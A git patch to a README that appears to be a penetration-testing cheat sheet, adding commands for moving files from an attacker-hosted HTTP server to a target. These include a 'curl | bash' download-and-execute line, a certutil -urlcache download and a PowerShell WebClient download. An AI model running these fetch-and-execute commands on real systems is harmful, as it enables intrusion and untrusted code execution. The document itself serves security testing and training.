From a33a74b6ed1673df14c89c4c0cad8e4f525d7f19 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 1 Sep 2022 11:50:13 -0400 Subject: [PATCH] Update README.md --- README.md | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index c3ba156..78bccaa 100644 --- a/README.md +++ b/README.md @@ -724,12 +724,16 @@ sudo python3 -m http.server {PORT} # Download: Pre-installed on Kali Linux # Usage - Download on server machine -wget http://{IP ADDRESS}/{FILE} -outfile {FILE} +wget {IP ADDRESS}/{FILE} -outfile {FILE} +curl {IP ADDRESS}/{FILE} -# Download file and execute in bash: +# Linux - Download file and execute in bash: curl {IP ADDRESS}/{FILE.sh} | bash -# Download file using powershell +# Windows - Download file using certutil +certutil -split -f -urlcache http://{IP ADDRESS}/{FILE} + +# Windows - Download file using powershell powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')" # {IP ADDRESS}: IP Address of the client from step one (python server)